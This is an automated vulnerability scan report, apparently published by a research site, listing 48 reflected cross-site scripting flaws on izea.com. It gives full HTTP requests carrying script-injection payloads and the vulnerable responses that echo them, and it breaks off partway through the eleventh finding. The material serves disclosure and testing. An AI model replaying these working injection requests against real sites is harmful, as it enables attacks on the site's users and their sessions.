Report generated by XSS.CX at Fri Nov 05 09:32:13 CDT 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. Cross-site scripting (reflected)

1.1. http://izea.com/about-izea/ [REST URL parameter 1]

1.2. http://izea.com/about-izea/ [name of an arbitrarily supplied request parameter]

1.3. http://izea.com/about-izea/leadership-team/ [REST URL parameter 2]

1.4. http://izea.com/about-izea/leadership-team/ [name of an arbitrarily supplied request parameter]

1.5. http://izea.com/about-izea/leadership-team/ted-murphy/ [REST URL parameter 1]

1.6. http://izea.com/about-izea/leadership-team/ted-murphy/ [REST URL parameter 2]

1.7. http://izea.com/about-izea/leadership-team/ted-murphy/ [REST URL parameter 3]

1.8. http://izea.com/about-izea/leadership-team/ted-murphy/ [name of an arbitrarily supplied request parameter]

1.9. http://izea.com/contact-us/ [REST URL parameter 1]

1.10. http://izea.com/contact-us/ [name of an arbitrarily supplied request parameter]

1.11. http://izea.com/privacy-policy/ [REST URL parameter 1]

1.12. http://izea.com/privacy-policy/ [name of an arbitrarily supplied request parameter]

1.13. http://izea.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 1]

1.14. http://izea.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 2]

1.15. http://izea.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 3]

1.16. http://izea.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 4]

1.17. http://izea.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 1]

1.18. http://izea.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 2]

1.19. http://izea.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 3]

1.20. http://izea.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 4]

1.21. http://izea.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 1]

1.22. http://izea.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 2]

1.23. http://izea.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 3]

1.24. http://izea.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 4]

1.25. http://izea.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 5]

1.26. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 1]

1.27. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 2]

1.28. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 3]

1.29. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 4]

1.30. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 5]

1.31. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 1]

1.32. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 2]

1.33. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 3]

1.34. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 4]

1.35. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 5]

1.36. http://izea.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 1]

1.37. http://izea.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 2]

1.38. http://izea.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 3]

1.39. http://izea.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 4]

1.40. http://izea.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 1]

1.41. http://izea.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 2]

1.42. http://izea.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 3]

1.43. http://izea.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 4]

1.44. http://izea.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

1.45. http://izea.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

1.46. http://izea.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

1.47. http://izea.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

1.48. http://izea.com/xmlrpc.php [REST URL parameter 1]



1. Cross-site scripting (reflected)
There are 48 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://izea.com/about-izea/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /about-izea/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9270"><script>alert(1)</script>a89be027fb0 was submitted in the REST URL parameter 1. This input was echoed as c9270\"><script>alert(1)</script>a89be027fb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-izeac9270"><script>alert(1)</script>a89be027fb0/ HTTP/1.1
Host: izea.com
Proxy-Connection: keep-alive
Referer: http://izea.com/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; sifrFetch=true; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; __utmc=250356574; __utmb=250356574.6.10.1288966493

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:28:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:28:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/about-izeac9270\"><script>alert(1)</script>a89be027fb0/"/>
...[SNIP]...

1.2. http://izea.com/about-izea/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /about-izea/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5822c"><script>alert(1)</script>6c36dcbf646 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5822c\"><script>alert(1)</script>6c36dcbf646 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-izea/?5822c"><script>alert(1)</script>6c36dcbf646=1 HTTP/1.1
Host: izea.com
Proxy-Connection: keep-alive
Referer: http://izea.com/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; sifrFetch=true; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; __utmc=250356574; __utmb=250356574.6.10.1288966493

Response

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 14:27:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://izea.com/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 20287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/about-izea/?5822c\"><script>alert(1)</script>6c36dcbf646=1"/>
...[SNIP]...

1.3. http://izea.com/about-izea/leadership-team/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /about-izea/leadership-team/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 919ba"><script>alert(1)</script>4fd1cf06c86 was submitted in the REST URL parameter 2. This input was echoed as 919ba\"><script>alert(1)</script>4fd1cf06c86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-izea/leadership-team919ba"><script>alert(1)</script>4fd1cf06c86/ HTTP/1.1
Host: izea.com
Proxy-Connection: keep-alive
Referer: http://izea.com/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; sifrFetch=true; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; __utmc=250356574; __utmb=250356574.6.10.1288966493

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:30:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:30:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/about-izea/leadership-team919ba\"><script>alert(1)</script>4fd1cf06c86/"/>
...[SNIP]...

1.4. http://izea.com/about-izea/leadership-team/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /about-izea/leadership-team/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2037"><script>alert(1)</script>07a5c11bd1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2037\"><script>alert(1)</script>07a5c11bd1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-izea/leadership-team/?b2037"><script>alert(1)</script>07a5c11bd1e=1 HTTP/1.1
Host: izea.com
Proxy-Connection: keep-alive
Referer: http://izea.com/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; sifrFetch=true; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; __utmc=250356574; __utmb=250356574.6.10.1288966493

Response

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 14:27:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://izea.com/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 20999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/about-izea/leadership-team/?b2037\"><script>alert(1)</script>07a5c11bd1e=1"/>
...[SNIP]...

1.5. http://izea.com/about-izea/leadership-team/ted-murphy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /about-izea/leadership-team/ted-murphy/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d35a"><script>alert(1)</script>9594dc97295 was submitted in the REST URL parameter 1. This input was echoed as 7d35a\"><script>alert(1)</script>9594dc97295 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-izea7d35a"><script>alert(1)</script>9594dc97295/leadership-team/ted-murphy/ HTTP/1.1
Host: izea.com
Proxy-Connection: keep-alive
Referer: http://izea.com/about-izea/leadership-team/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; sifrFetch=true; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; __utmc=250356574; __utmb=250356574.7.10.1288966493

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:29:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/about-izea7d35a\"><script>alert(1)</script>9594dc97295/leadership-team/ted-murphy/"/>
...[SNIP]...

1.6. http://izea.com/about-izea/leadership-team/ted-murphy/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /about-izea/leadership-team/ted-murphy/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65467"><script>alert(1)</script>be6dd15743f was submitted in the REST URL parameter 2. This input was echoed as 65467\"><script>alert(1)</script>be6dd15743f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-izea/leadership-team65467"><script>alert(1)</script>be6dd15743f/ted-murphy/ HTTP/1.1
Host: izea.com
Proxy-Connection: keep-alive
Referer: http://izea.com/about-izea/leadership-team/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; sifrFetch=true; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; __utmc=250356574; __utmb=250356574.7.10.1288966493

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:30:06 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:30:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/about-izea/leadership-team65467\"><script>alert(1)</script>be6dd15743f/ted-murphy/"/>
...[SNIP]...

1.7. http://izea.com/about-izea/leadership-team/ted-murphy/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /about-izea/leadership-team/ted-murphy/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70c82"><script>alert(1)</script>46200feae27 was submitted in the REST URL parameter 3. This input was echoed as 70c82\"><script>alert(1)</script>46200feae27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-izea/leadership-team/ted-murphy70c82"><script>alert(1)</script>46200feae27/ HTTP/1.1
Host: izea.com
Proxy-Connection: keep-alive
Referer: http://izea.com/about-izea/leadership-team/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; sifrFetch=true; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; __utmc=250356574; __utmb=250356574.7.10.1288966493

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:30:59 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:31:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/about-izea/leadership-team/ted-murphy70c82\"><script>alert(1)</script>46200feae27/"/>
...[SNIP]...

1.8. http://izea.com/about-izea/leadership-team/ted-murphy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /about-izea/leadership-team/ted-murphy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ace9"><script>alert(1)</script>e3b078acdc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1ace9\"><script>alert(1)</script>e3b078acdc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-izea/leadership-team/ted-murphy/?1ace9"><script>alert(1)</script>e3b078acdc5=1 HTTP/1.1
Host: izea.com
Proxy-Connection: keep-alive
Referer: http://izea.com/about-izea/leadership-team/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; sifrFetch=true; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; __utmc=250356574; __utmb=250356574.7.10.1288966493

Response

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 14:27:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://izea.com/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 20396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/about-izea/leadership-team/ted-murphy/?1ace9\"><script>alert(1)</script>e3b078acdc5=1"/>
...[SNIP]...

1.9. http://izea.com/contact-us/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /contact-us/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd72a"><script>alert(1)</script>0221122bbb9 was submitted in the REST URL parameter 1. This input was echoed as fd72a\"><script>alert(1)</script>0221122bbb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact-usfd72a"><script>alert(1)</script>0221122bbb9/ HTTP/1.1
Host: izea.com
Proxy-Connection: keep-alive
Referer: http://izea.com/partners/featured-data-providers/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; sifrFetch=true; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; __utmc=250356574; __utmb=250356574.5.10.1288966493

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:28:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:28:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/contact-usfd72a\"><script>alert(1)</script>0221122bbb9/"/>
...[SNIP]...

1.10. http://izea.com/contact-us/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /contact-us/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6009d"><script>alert(1)</script>a4dd31a01a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6009d\"><script>alert(1)</script>a4dd31a01a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact-us/?6009d"><script>alert(1)</script>a4dd31a01a3=1 HTTP/1.1
Host: izea.com
Proxy-Connection: keep-alive
Referer: http://izea.com/partners/featured-data-providers/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; sifrFetch=true; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; __utmc=250356574; __utmb=250356574.5.10.1288966493

Response

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 14:27:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://izea.com/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 21606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/contact-us/?6009d\"><script>alert(1)</script>a4dd31a01a3=1"/>
...[SNIP]...

1.11. http://izea.com/privacy-policy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /privacy-policy/

Issue detail

